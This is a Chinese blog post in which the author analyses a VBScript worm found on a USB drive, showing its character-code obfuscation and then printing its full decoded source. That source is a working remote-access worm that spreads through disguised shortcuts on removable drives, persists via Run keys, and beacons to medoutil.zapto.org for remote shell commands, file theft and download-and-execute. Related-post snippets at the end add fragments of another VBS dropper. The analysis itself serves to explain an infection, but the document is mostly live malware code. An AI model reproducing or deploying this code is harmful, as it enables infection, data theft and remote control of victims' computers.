Virus name: flgjahzqvm.vbs

笔者最近因为在公共电脑上COPY了某些文件,回来打开便发现了U盘里的东西都变成了快捷方式,而起根目录下赫然发现了一个.vbs文件。

点开快捷方式的属性,也发现在打开之前,目标也都指向了 flgjahzqvm.vbs文件。

病毒的源文件是这样写的 :“

b1="3"
b2="9"
b3="|"
b4="6"
b5="0"
b6="|"
b7="9"
b8="1"
b9="|"
b10="3"
b11="2"
b12="|"
b13="1"
b14="1"
b15="4"
b16="|"
b17="1"
b18="0"
b19="1"
b20="|"
b21="9"
b22="9"
b23="|"
b24="1"
b25="1"
b26="1"
b27="|"
b28="1"
b29="0"
b30="0"
b31="|"
b32="1"
b33="0"
b34="1"
b35="|"
b36="1"
b37="1"
b38="4"
b39="|"
b40="3"
b41="2"
b42="|"
b43="5"
b44="8"
b45="|"
b46="3"
b47="2"
b48="|"
b49="1"
b50="0"
b1= b1 & b2 & b3 & b4 & b5 & b6 & b7 & b8 & b9 & b10 & b11 & b12 & b13 & b14 & b15 & b16 & b17 & b18 & b19 & b20 & b21 & b22 & b23 & b24 & b25 & b26 & b27 & b28 & b29 & b30 & b31 & b32 & b33 & b34 & b35 & b36 & b37 & b38 & b39 & b40 & b41 & b42 & b43 & b44 & b45 & b46 & b47 & b48 & b49 & b50
b51="4"
b52="|"
b53="1"
b54="1"
b55="1"
b56="|"
b57="1"
b58="1"
b59="7"
b60="|"
b61="1"
b62="0"
b63="0"
b64="|"
b65="1"
b66="0"
b67="5"
b68="|"
b69="1"
b70="1"
b71="0"
b72="|"
b73="1"
b74="0"
b75="5"
b76="|"
b77="3"
b78="2"
b79="|"
b80="4"
b81="0"
b82="|"
b83="9"
b84="9"
b85="|"
b86="4"
b87="1"
b88="|"
b89="3"
b90="2"
b91="|"
b92="1"
b93="1"
b94="5"
b95="|"
b96="1"
b97="0"
b98="7"
b99="|"
b100="1"
b1= b1 & b51 & b52 & b53 & b54 & b55 & b56 & b57 & b58 & b59 & b60 & b61 & b62 & b63 & b64 & b65 & b66 & b67 & b68 & b69 & b70 & b71 & b72 & b73 & b74 & b75 & b76 & b77 & b78 & b79 & b80 & b81 & b82 & b83 & b84 & b85 & b86 & b87 & b88 & b89 & b90 & b91 & b92 & b93 & b94 & b95 & b96 & b97 & b98 & b99 & b100
b101="2"
b102="1"
b103="|"
b104="1"
b105="1"
b106="2"
b107="|"
b108="1"
b109="0"
b110="1"
b111="|"
b112="3"
b113="2"
b114="|"
b115="5"
b116="8"
b117="|"
b118="3"
b119="2"
b120="|"
b121="1"

……

b1 = SPLIT(b1,"|")
FOR I = 0 TO UBOUND(b1) -1
NJ = NJ & CHR(b1(I))
NEXT
ExecuteGlobal (NJ)

是不是乍一看一堆变量,一脸懵逼?

其实它将字符串拆成一堆字符,从而躲避杀毒软件的查杀。

翻译后是这样的:

‘<[ recoder : houdini (c) skype : houdini-fx ]>

‘=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "medoutil.zapto.org"
port = 88
installdir = "%temp%"
lnkfile = true
lnkfolder = true

‘=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")

‘=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

‘=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next

instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
case "send"
download cmd (1),cmd (2)
case "site-send"
sitedownloader cmd (1),cmd (2)
case "recv"
param = cmd (1)
upload (param)
case "enum-driver"
post "is-enum-driver",enumdriver
case "enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case "enum-process"
post "is-enum-process",enumprocess
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
param = cmd (1)
deletefaf (param)
case "exit-process"
param = cmd (1)
exitprocess (param)
case "sleep"
param = cmd (1)
sleep = eval (param)
end select

wscript.sleep sleep

wend

sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
if filesystemobj.fileexists (drive.path & "\" & installname) then
filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
end if
for each file in filesystemobj.getfolder( drive.path & "\" ).Files
if not lnkfile then exit for
if instr (file.name,".") then
if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 2+4
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
if instr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
if instr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
for each file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
if instr (file.name,".") then
if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 0
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if inf = "" then
inf = hwid & spliter
inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function

sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub

function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
if disk.volumeserialnumber <> "" then
hwid = disk.volumeserialnumber
exit for
end if
next
end function

function security
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for x = 1 to ubound (versionstr)
osversion = osversion & versionstr (i)
next
osversion = eval (osversion)
if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
security = security & objantivirus.displayname & " ."
next
if security = "" then security = "nan-av"
end function

function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
usbspreading = "true - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
else
usbspreading = "false - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"

end if
end If

upstart
set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort = filesystemobj.getfile (installdir & installname)
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if err.number > 0 then wscript.quit
end function

sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if

if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub

sub download (fileurl,filedir)

if filedir = "" then
filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""

set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub

function upload (fileurl)

dim httpobj,objstreamuploade,buffer
set objstreamuploade = createobject("adodb.stream")
with objstreamuploade
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function

function enumdriver ()

for each drive in filesystemobj.drives
if drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for each folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for each file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter

next
end function

function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if

cmdshell = readallfromany
end function

时间: 2024-11-06 16:44:28

Virus name: flgjahzqvm.vbs的相关文章

Vbs 测试程序一

转载请注明出处 有点小恶意哦!慎重测试 'This procedure is written in SeChaos, only for entertainment, not malicious communication, crack or rewrite.I am not liable, the final interpretation of all SeChaos.dim fso,wsh,myfile,ws,pp,fsoFolder set wsh=wscript.createobject(

下了个蓝屏代码查看工具,就中病毒了。。。什么鬼病毒,竟然还是用的VBS

扫描所有盘下面的html文件,加入VBS脚本...真是奇葩,多少年前的病毒了... http://files.cnblogs.com/files/guangshan/lpdmcxq.rar 这个是病毒链接,下载地址也在里面. 原理是为所有的html文件增加一段脚本: </div><SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300

VBS练习题

练习题: 1.输入3个数,输出其中最大的那个值. Option Explicit Dim intA,intB,intC intA=CInt(InputBox("请输入a:")) intB=CInt(InputBox("请输入b:")) intC=CInt(InputBox("请输入c:")) If intA>intB And intA>intC Then MsgBox "最大值是:"&intA ElseIf

最近碰到了一个病毒木马:virus.win32.ramnit.B

由于 使用了 简单游 平台上的挂机工具: 番茄-自动人机对战免费版1217  ,使用了很久,头段时间家里电脑 360提示有病毒,本来我一直忽略的,但 我扫描了一下,大量的这个木马,于是 吧 简单游卸载了,全盘扫描,杀毒,修复了许多文件.许多文件被感染,文件大小都变了,还好 360 可以修复感染文件. 这一次,我是用公司电脑,再次 尝试使用 简单游 的挂机工具,没想到 依旧 是这个病毒 virus.win32.ramnit.B ,又是感染了大量的文件.360 居然没有提醒,还好 我清理电脑垃圾 顺

今天中了一个脚本病毒。把我的所有 html 加了 vbs 脚本,WriteData 是什么鬼?

今天中了一个脚本病毒.把我的所有 html 加了 vbs 脚本: WriteData 是什么鬼? <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000

用VBS控制鼠标(获取鼠标坐标、鼠标移动、鼠标单击、鼠标双击、鼠标右击)

Demon's Blog 忘记了,喜欢一个人的感觉 Demon's Blog  ?  程序设计  ?  用VBS控制鼠标(获取鼠标坐标.鼠标移动.鼠标单击.鼠标双击.鼠标右击) ? bbPress积分插件--Virtual Money VBS调用WMI监视注册表变动 ? 用VBS控制鼠标(获取鼠标坐标.鼠标移动.鼠标单击.鼠标双击.鼠标右击) 标题: 用VBS控制鼠标(获取鼠标坐标.鼠标移动.鼠标单击.鼠标双击.鼠标右击)作者: Demon链接: http://demon.tw/programm

开机自动播放音乐的vbs

今天无意间看到了vbs这小玩意,就突发奇想,自学了一下,倒弄出如下的小玩意,大牛勿喷!这个可用做撩妹神技也可以用于提醒自己!使用方法:复制程序到txt文本里面保存,然后改后缀为vbs,丢到C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp便可开机自启!红色的为歌曲路径,这个要设置对,绿色的看心情修改,感觉好用的热心一下,别浪费了! 程序1:CreateObject("SAPI.SpVoice").Speak &quo

使用VBS脚本实现的Hosts文件一键配置

hosts文件存储了IP地址与域名的映射.因为有的时候需要经常性地配置hosts文件,因此这段时间我琢磨了一套傻瓜化的hosts文件配置方案,记录如下. 先说一下怎么样进入hosts文件,Windows环境(我用的是一个32位的Win7)下hosts文件在计算机中的位置,在目录%windir%\System32\drivers\etc\hosts下.不过相比每次都要点很多目录才能找到hosts文件,我们可以通过执行下面这个脚本直接用记事本打开hosts文件: @echo off  if "%1&

关于VBS的一个怪现象

今天一个同学让我帮忙写一个程序,要求是: 输入一个n,返回从0到n中任意个数的组合,返回取异或结果为0的组合.来看VBS代码 n = 6 p = "" for i = 0 to 2^n - 1 s = 0 for j = 0 to n-1 s = s xor (j+1) * ((i and 2^j) / 2^j) next if s=0 then D2B(i) end if next 'Set objFSO = CreateObject("Scripting.FileSyst